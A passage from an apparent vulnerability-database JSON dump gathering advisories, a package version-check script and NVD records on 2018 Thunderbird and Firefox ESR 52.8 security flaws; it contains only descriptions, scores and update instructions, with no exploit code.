res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"52.8.0esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "**Issue Overview:**\n\nThe following CVEs are fixed in the updated thunderbird package:\n\n[CVE-2018-5161 __](<https://access.redhat.com/security/cve/CVE-2018-5161>): Hang via malformed headers \n[CVE-2018-5162 __](<https://access.redhat.com/security/cve/CVE-2018-5162>): Encrypted mail leaks plaintext through src attribute \n[CVE-2018-5183 __](<https://access.redhat.com/security/cve/CVE-2018-5183>): Backport critical security fixes in Skia \n[CVE-2018-5155 __](<https://access.redhat.com/security/cve/CVE-2018-5155>): Use-after-free with SVG animations and text paths \n[CVE-2018-5170 __](<https://access.redhat.com/security/cve/CVE-2018-5170>): Filename spoofing for external attachments \n[CVE-2018-5184 __](<https://access.redhat.com/security/cve/CVE-2018-5184>): Full plaintext recovery in S/MIME via chosen-ciphertext attack \n[CVE-2018-5159 __](<https://access.redhat.com/security/cve/CVE-2018-5159>): Integer overflow and out-of-bounds write in Skia \n[CVE-2018-5178 __](<https://access.redhat.com/security/cve/CVE-2018-5178>): Buffer overflow during UTF-8 to Unicode string conversion through legacy extension \n[CVE-2018-5168 __](<https://access.redhat.com/security/cve/CVE-2018-5168>): Lightweight themes can be installed without user interaction \n[CVE-2018-5150 __](<https://access.redhat.com/security/cve/CVE-2018-5150>): Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 \n[CVE-2018-5154 __](<https://access.redhat.com/security/cve/CVE-2018-5154>): Use-after-free with SVG animations and clip paths \n[CVE-2018-5185 __](<https://access.redhat.com/security/cve/CVE-2018-5185>): Leaking plaintext through HTML forms\n\n \n**Affected Packages:** \n\n\nthunderbird\n\n \n**Issue Correction:** \nRun _yum update thunderbird_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n src: \n thunderbird-52.8.0-1.amzn2.src \n \n x86_64: \n thunderbird-52.8.0-1.amzn2.x86_64 \n thunderbird-debuginfo-52.8.0-1.amzn2.x86_64 \n \n \n", "edition": 1, "modified": "2018-06-07T23:30:00", "published": "2018-06-07T23:30:00", "id": "ALAS2-2018-1032", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-1032.html", "title": "Critical: thunderbird", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2018-05-21T04:13:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5174", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "This update for Mozilla Thunderbird to version 52.8 fixes the following\n issues:\n\n Security issues fixed (MFSA 2018-13, boo#1092548):\n\n - CVE-2018-5183: Backport critical security fixes in Skia\n - CVE-2018-5154: Use-after-free with SVG animations and clip paths\n - CVE-2018-5155: Use-after-free with SVG animations and text paths\n - CVE-2018-5159: Integer overflow and out-of-bounds write in Skia\n - CVE-2018-5168: Lightweight themes can be installed without user\n interaction\n - CVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion\n through legacy extension\n - CVE-2018-5150: Memory safety bugs fixed in Firefox 60, Firefox ESR 52.8,\n and Thunderbird 52.8\n - CVE-2018-5161: Hang via malformed headers (bsc#1093970)\n - CVE-2018-5162: Encrypted mail leaks plaintext through src attribute\n (bsc#1093971)\n - CVE-2018-5170: Filename spoofing for external attachments (bsc#1093972)\n - CVE-2018-5184: Full plaintext recovery in S/MIME via chosen-ciphertext\n attack (bsc#1093969)\n - CVE-2018-5185: Leaking plaintext through HTML forms (bsc#1093973)\n\n", "edition": 1, "modified": "2018-05-21T03:06:59", "published": "2018-05-21T03:06:59", "id": "OPENSUSE-SU-2018:1359-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00087.html", "title": "Security update for Mozilla Thunderbird (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-21T04:13:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5174", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "This update for Mozilla Thunderbird to version 52.8 fixes the following\n issues:\n\n Security issues fixed (MFSA 2018-13, boo#1092548):\n\n - CVE-2018-5183: Backport critical security fixes in Skia\n - CVE-2018-5154: Use-after-free with SVG animations and clip paths\n - CVE-2018-5155: Use-after-free with SVG animations and text paths\n - CVE-2018-5159: Integer overflow and out-of-bounds write in Skia\n - CVE-2018-5168: Lightweight themes can be installed without user\n interaction\n - CVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion\n through legacy extension\n - CVE-2018-5150: Memory safety bugs fixed in Firefox 60, Firefox ESR 52.8,\n and Thunderbird 52.8\n - CVE-2018-5161: Hang via malformed headers (bsc#1093970)\n - CVE-2018-5162: Encrypted mail leaks plaintext through src attribute\n (bsc#1093971)\n - CVE-2018-5170: Filename spoofing for external attachments (bsc#1093972)\n - CVE-2018-5184: Full plaintext recovery in S/MIME via chosen-ciphertext\n attack (bsc#1093969)\n - CVE-2018-5185: Leaking plaintext through HTML forms (bsc#1093973)\n\n", "edition": 1, "modified": "2018-05-21T03:08:11", "published": "2018-05-21T03:08:11", "id": "OPENSUSE-SU-2018:1361-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00089.html", "title": "Security update for Mozilla Thunderbird (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-05-11T02:06:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5155", "CVE-2018-5183", "CVE-2018-5157", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "This update for Mozilla Firefox to 52.8.0 ESR fixes the following issues:\n\n Security issssue fixed: (bsc#1092548, MFSA 2018-12):\n\n - CVE-2018-5183: Backport critical security fixes in Skia\n - CVE-2018-5154: Use-after-free with SVG animations and clip paths\n - CVE-2018-5155: Use-after-free with SVG animations and text paths\n - CVE-2018-5157: Same-origin bypass of PDF Viewer to view protected PDF\n files\n - CVE-2018-5158: Malicious PDF can inject JavaScript into PDF Viewer\n - CVE-2018-5159: Integer overflow and out-of-bounds write in Skia\n - CVE-2018-5168: Lightweight themes can be installed without user\n interaction\n - CVE-2018-5178: Buffer overflow during UTF-8 to Unicode string conversion\n through legacy extension\n - CVE-2018-5150: Memory safety bugs fixed in Firefox 60 and Firefox ESR\n 52.8\n\n The following non-security changes are included:\n\n - Various stability and regression fixes\n - Performance improvements to the Safe Browsing service to avoid slowdowns\n while updating site classification data\n\n", "edition": 1, "modified": "2018-05-11T00:14:24", "published": "2018-05-11T00:14:24", "id": "OPENSUSE-SU-2018:1212-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-05/msg00017.html", "title": "Security update for Mozilla Firefox (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:41:34", "bulletinFamily": "info", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5174", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "### *Detect date*:\n05/18/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, bypass security restrictions and spoof user interface.\n\n### *Affected products*:\nMozilla Thunderbird earlier than 52.8\n\n### *Solution*:\nUpdate to latest version \n[Download Mozilla Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>)\n\n### *Original advisories*:\n[Mozilla Foundation Security Advisory 2018-13](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Thunderbird](<https://threats.kaspersky.com/en/product/Mozilla-Thunderbird/>)\n\n### *CVE-IDS*:\n[CVE-2018-5154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5154>)0.0Unknown \n[CVE-2018-5155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5155>)0.0Unknown \n[CVE-2018-5159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5159>)0.0Unknown \n[CVE-2018-5168](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5168>)0.0Unknown \n[CVE-2018-5174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5174>)0.0Unknown \n[CVE-2018-5150](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5150>)0.0Unknown \n[CVE-2018-5183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5183>)0.0Unknown \n[CVE-2018-5184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5184>)7.5Critical \n[CVE-2018-5161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5161>)4.3Warning \n[CVE-2018-5162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5162>)7.5Critical \n[CVE-2018-5170](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5170>)4.3Warning \n[CVE-2018-5178](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5178>)0.0Unknown \n[CVE-2018-5185](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5185>)6.5High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 38, "modified": "2020-06-18T00:00:00", "published": "2018-05-18T00:00:00", "id": "KLA11251", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11251", "title": "\r KLA11251Multiple vulnerabilities in Mozilla Thunderbird ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:48:31", "bulletinFamily": "info", "cvelist": ["CVE-2018-5173", "CVE-2018-5150", "CVE-2018-5169", "CVE-2018-5178", "CVE-2018-5180", "CVE-2018-5175", "CVE-2018-5155", "CVE-2018-5177", "CVE-2018-5176", "CVE-2018-5172", "CVE-2018-5183", "CVE-2018-5167", "CVE-2018-5166", "CVE-2018-5152", "CVE-2018-5165", "CVE-2018-5151", "CVE-2018-5160", "CVE-2018-5179", "CVE-2018-5157", "CVE-2018-5182", "CVE-2018-5163", "CVE-2018-5154", "CVE-2018-5164", "CVE-2018-5153", "CVE-2018-5174", "CVE-2018-5181", "CVE-2018-5168", "CVE-2018-5158", "CVE-2018-5159"], "description": "### *Detect date*:\n05/09/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Mozilla Firefox. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, gain privileges, execute arbitrary code, perform XSS attacks and bypass security restrictions. Below is a complete list of vulnerabilities:\n\n### *Affected products*:\nMozilla Firefox ESR earlier than 52.8 \nMozilla Firefox earlier than 60\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox ESR](<https://www.mozilla.org/en-US/firefox/organizations/all/>) \n[Download Mozilla Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[Mozilla Foundation Security Advisory 2018-11](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-11>) \n[Mozilla Foundation Security Advisory 2018-12](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-12>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2018-5154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5154>)0.0Unknown \n[CVE-2018-5155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5155>)0.0Unknown \n[CVE-2018-5157](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5157>)0.0Unknown \n[CVE-2018-5158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5158>)0.0Unknown \n[CVE-2018-5159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5159>)0.0Unknown \n[CVE-2018-5160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5160>)0.0Unknown \n[CVE-2018-5152](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5152>)0.0Unknown \n[CVE-2018-5153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5153>)0.0Unknown \n[CVE-2018-5163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5163>)0.0Unknown \n[CVE-2018-5164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5164>)0.0Unknown \n[CVE-2018-5166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5166>)0.0Unknown \n[CVE-2018-5167](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5167>)0.0Unknown \n[CVE-2018-5168](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5168>)0.0Unknown \n[CVE-2018-5169](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5169>)0.0Unknown \n[CVE-2018-5172](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5172>)0.0Unknown \n[CVE-2018-5173](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5173>)0.0Unknown \n[CVE-2018-5174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5174>)0.0Unknown \n[CVE-2018-5175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5175>)0.0Unknown \n[CVE-2018-5176](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5176>)0.0Unknown \n[CVE-2018-5177](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5177>)0.0Unknown \n[CVE-2018-5165](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5165>)0.0Unknown \n[CVE-2018-5180](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5180>)0.0Unknown \n[CVE-2018-5181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5181>)0.0Unknown \n[CVE-2018-5182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5182>)0.0Unknown \n[CVE-2018-5151](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5151>)0.0Unknown \n[CVE-2018-5150](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5150>)0.0Unknown \n[CVE-2018-5183](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5183>)0.0Unknown \n[CVE-2018-5178](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5178>)0.0Unknown \n[CVE-2018-5179](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5179>)0.0Unknown\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2018-05-09T00:00:00", "id": "KLA11246", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11246", "title": "\r KLA11246Multiple vulnerabilities in Mozilla Firefox and Firefox ESR ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:25:44", "description": "Using remote content in encrypted messages can lead to the disclosure of plaintext. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5184", "type": "cve", "cwe": ["CWE-326"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5184"], "modified": "2019-03-13T14:23:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5184", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Plaintext of decrypted emails can leak through by user submitting an embedded form. This vulnerability affects Thunderbird ESR < 52.8 and Thunderbird < 52.8.", "edition": 10, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5185", "type": "cve", "cwe": ["CWE-311"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5185"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5185", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "A buffer overflow was found during UTF8 to Unicode string conversion within JavaScript with extremely large amounts of data. This vulnerability requires the use of a malicious or vulnerable legacy extension in order to occur. This vulnerability affects Thunderbird ESR < 52.8, Thunderbird < 52.8, and Firefox ESR < 52.8.", "edition": 11, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T21:29:00", "title": "CVE-2018-5178", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5178"], "modified": "2019-03-11T15:20:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-5178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5178", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Sites can bypass security checks on permissions to install lightweight themes by manipulating the \"baseURI\" property of the theme element. This could allow a malicious site to install a theme without user interaction which could contain offensive or embarrassing images. This vulnerability affects Thunderbird < 52.8, Thunderbird ESR < 52.8, Firefox < 60, and Firefox ESR < 52.8.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": 